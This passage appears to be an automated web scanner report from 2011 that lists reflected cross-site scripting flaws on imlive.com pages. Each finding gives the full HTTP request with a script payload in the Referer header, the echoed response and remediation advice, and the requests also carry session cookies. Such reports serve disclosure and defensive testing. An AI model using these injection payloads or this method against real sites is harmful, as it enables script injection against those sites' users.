User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=18795'-alert(1)-'f742b451262
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:02 GMT
Connection: close
Content-Length: 18928
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx&rf=http://www.google.com/search?hl=en^q=18795'-alert(1)-'f742b451262&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9024'-alert(1)-'8f7cf0979cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=b9024'-alert(1)-'8f7cf0979cd
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e210'><script>alert(1)</script>f3991d075f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /sitemap.html HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=4e210'><script>alert(1)</script>f3991d075f5
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:11 GMT
Connection: close
Content-Length: 33816
Vary: Accept-Encoding
<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/sitemap.html&lr=1107816008&ud=0&pe=sitemap.asp&rf=http://www.google.com/search?hl=en^q=4e210'><script>alert(1)</script>f3991d075f5&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 111ed'><script>alert(1)</script>4d6efbd9952 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /videosfr.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=111ed'><script>alert(1)</script>4d6efbd9952
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:47 GMT
Connection: close
Content-Length: 15789
Vary: Accept-Encoding
<html> <head> <title>Video Chat Recorded on Webcam at ImLive</title> <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/videosfr.asp&lr=1107816009&ud=0&pe=videosfr.asp&rf=http://www.google.com/search?hl=en^q=111ed'><script>alert(1)</script>4d6efbd9952&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ff88f'><script>alert(1)</script>7d0fb5f5c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /warningms.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=ff88f'><script>alert(1)</script>7d0fb5f5c2
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:18 GMT
Connection: close
Content-Length: 14501
Vary: Accept-Encoding
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad308'-alert(1)-'2250bef2d23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-advanced-search/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=ad308'-alert(1)-'2250bef2d23
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:58 GMT
Connection: close
Content-Length: 74454
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... "text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/&rf=http://www.google.com/search?hl=en^q=ad308'-alert(1)-'2250bef2d23&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fad7'-alert(1)-'8afcbd3f2d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-faq/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=2fad7'-alert(1)-'8afcbd3f2d9
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e5a5'-alert(1)-'88572b36594 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f7f4'-alert(1)-'eebadb10194 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-sign-up/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=4f7f4'-alert(1)-'eebadb10194
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9d2b'-alert(1)-'d37559930d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wmaster.ashx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=f9d2b'-alert(1)-'d37559930d9
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a1e0b'><script>alert(1)</script>829092c5393 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp&waron=yes&promocode=YZSUSA5583 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=a1e0b'><script>alert(1)</script>829092c5393
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbbcb'-alert(1)-'3f0965cdc19 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cbbcb'-alert(1)-'3f0965cdc19
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59e4e'-alert(1)-'86c82395764 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=59e4e'-alert(1)-'86c82395764
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a33e'-alert(1)-'3a6e8f04043 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
